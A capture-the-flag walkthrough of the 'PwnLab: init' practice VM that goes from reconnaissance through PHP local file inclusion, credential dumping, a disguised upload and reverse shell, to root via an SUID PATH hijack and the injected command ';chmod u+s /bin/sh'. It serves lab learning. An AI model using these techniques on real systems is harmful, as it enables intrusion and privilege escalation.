PwnLab: init



Welcome to “PwnLab: init”, my first Boot2Root virtual machine. Meant to be easy, I hope you enjoy it and maybe learn something. The purpose of this CTF is to get root and read the flag.

Difficulty: Low
Flag: /root/flag.txt


nmap -T4 -sV -p-


It looks like 2 well-known ports and 2 registered ports are open. I’ll start with the website on port 80 and try dirb and nikto to get some more information.

+ (CODE:200|SIZE:332) 
+ (CODE:403|SIZE:301) 

---- Entering directory: ----
---- Entering directory: ----
nikto -h


  • /login.php
  • /config.php
  • /index.php

I first checked the upload page, but it was protected by the login. Because I didn’t had any credentials, I tried to brute force my way in with the rockyou wordlist. But after some waiting, it turned up with nothing. In the meantime I tried to check out config.php, but that was also a dead-end. After looking at the URL, I noticed the use of the parameter ‘/?page=’. My first guess was to look for a path traversal weakness. Nothing. My second try was to get a LFI. I googled for some php exploits and stumbled onto and

Local File Inclusion

After a few tries I finally discovered that I could use the PHP wrapper php://filter. Because the output is encoded using base64, I’ll need to decode the output.


This will let me to get the source of the PHP files on the server.


Time to load this up into burpsuite and let it do the heavy lifting. After looking at the found php pages, I got credentials from config.php.


$server = "localhost";
$username = "root";
$password = "H4u%QJ_H99";
$database = "Users";

From reading upload.php it was clear that there were some restrictions.

Only 4 file types were allowed:

$whitelist = array(".jpg",".jpeg",".gif",".png");

Also there were MIME restrictions:

if($imageinfo['mime'] != 'image/gif' && $imageinfo['mime'] != 'image/jpeg' && $imageinfo['mime'] != 'image/jpg'&& $imageinfo['mime'] != 'image/png')

And finally the file isn’t allowed to have multiple file types:

if(substr_count($filetype, '/')>1)

When I read the index.php file it seemed that there was also a ‘lang’ parameter which possible had a LFI vulnerability. At this moment I don’t know if this can help me.



With the found credentials I logged in the MySQL server.

root@PlanetMars:~# mysql --host= --port=3306 --user=root --password
Enter password: 
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 52
Server version: 5.5.47-0+deb8u1 (Debian)

Copyright (c) 2000, 2016, Oracle and/or its affiliates. All rights reserved.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
| Database |
| information_schema |
| Users |
2 rows in set (0.00 sec)

mysql> use Users;
Database changed

mysql> show tables;
| Tables_in_Users |
| users |
1 row in set (0.00 sec)

mysql> select * from users;
| user | pass |
| kent | Sld6WHVCSkpOeQ== |
| mike | U0lmZHNURW42SQ== |
| kane | aVN2NVltMkdSbw== |
3 rows in set (0.00 sec)


root@PlanetMars:~# echo 'Sld6WHVCSkpOeQ==' | base64 -d
root@PlanetMars:~# echo 'U0lmZHNURW42SQ==' | base64 -d
root@PlanetMars:~# echo 'aVN2NVltMkdSbw==' | base64 -d

Uploading a dirty file

I try the first credentials in the list: kent.


Since I know the restrictions of the upload.php file, I know how to adjust my php file.
I tried to upload the file and change the header to both JPG as JPEG, but for some reason that didn’t work. Changing the header to GIF worked like a charm.


Reversed shell

Earlier I found a LFI vulnerability in the ‘lang’ parameter. Maybe I can use this to execute the uploaded php file. After altering the cookie to ‘lang=../../../../../../var/www/html/upload/f3035846cc279a1aff73b7c2c25367b9.gif’ I got my reversed shell.


First let’s get a TTY shell.

python -c 'import pty;pty.spawn("/bin/bash");'
cat /etc/passwd

Looks like there are 4 users. One of them wasn’t in the MySQL database. ‘john’. Because I have the credentials of the 3 other users, I’ll log in with these.

www-data@pwnlab:/home$ su kent
su kent
Password: JWzXuBJJNy

cd kent
kent@pwnlab:~$ ls -lah
ls -lah
total 20K
drwxr-x--- 2 kent kent 4.0K Mar 17 10:06 .
drwxr-xr-x 6 root root 4.0K Mar 17 10:09 ..
-rw-r--r-- 1 kent kent 220 Mar 17 10:06 .bash_logout
-rw-r--r-- 1 kent kent 3.5K Mar 17 10:06 .bashrc
-rw-r--r-- 1 kent kent 675 Mar 17 10:06 .profile

kent@pwnlab:~$ su mike 
Password: SIfdsTEn6I
su: Authentication failure

kent@pwnlab:~$ su kane
Password: iSv5Ym2GRo
kane@pwnlab:/home/kent$ cd ..
kane@pwnlab:/home$ cd kane
kane@pwnlab:~$ ls -lah
total 28K
drwxr-x--- 2 kane kane 4.0K Mar 17 13:04 .
drwxr-xr-x 6 root root 4.0K Mar 17 10:09 ..
-rw-r--r-- 1 kane kane 220 Mar 17 10:09 .bash_logout
-rw-r--r-- 1 kane kane 3.5K Mar 17 10:09 .bashrc
-rwsr-sr-x 1 mike mike 5.1K Mar 17 13:04 msgmike
-rw-r--r-- 1 kane kane 675 Mar 17 10:09 .profile

A binary file named msgmike. When I run it I get:

cat: /home/mike/msg.txt: No such file or directory
strings msgmike
cat /home/mike/msg.txt

So it runs cat, but without an absolute path. By adjusting PATH to ‘.’ it will let me run my own cat binary with ‘/bin/sh’ inside.

kane@pwnlab:/tmp$ echo '/bin/sh' > cat
kane@pwnlab:/tmp$ export PATH=.
kane@pwnlab:/tmp$ /home/kane/msgmike
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:usr/bin:/sbin:/bin
$ id
uid=1002(mike) gid=1002(mike) groups=1002(mike),1003(kane)
mike@pwnlab:/$ cd /home/mike
mike@pwnlab:/home/mike$ ls -lah
total 28K
drwxr-x--- 2 mike mike 4.0K Mar 17 15:19 .
drwxr-xr-x 6 root root 4.0K Mar 17 10:09 ..
-rw-r--r-- 1 mike mike 220 Mar 17 10:08 .bash_logout
-rw-r--r-- 1 mike mike 3.5K Mar 17 10:08 .bashrc
-rwsr-sr-x 1 root root 5.3K Mar 17 13:07 msg2root
-rw-r--r-- 1 mike mike 675 Mar 17 10:08 .profile

Another binary.

mike@pwnlab:/home/mike$ ./msg2root
Message for root: ;whoami
strings msg2root
Message for root: 
/bin/echo %s >> /root/messages.txt

Alright. It echoes everything I feed it and run it as root.

$ ./msg2root
Message for root: ;chmod u+s /bin/sh
mike@pwnlab:/home/mike$ /bin/sh
# id
uid=1002(mike) gid=1002(mike) euid=0(root) groups=1002(mike),1003(kane)
# cd /root
# ls
flag.txt messages.txt
# cat flag.txt



This was an excellent challenge. The description said it was easy, but it gave me a run for my money (ok – it’s free – but you know what I mean).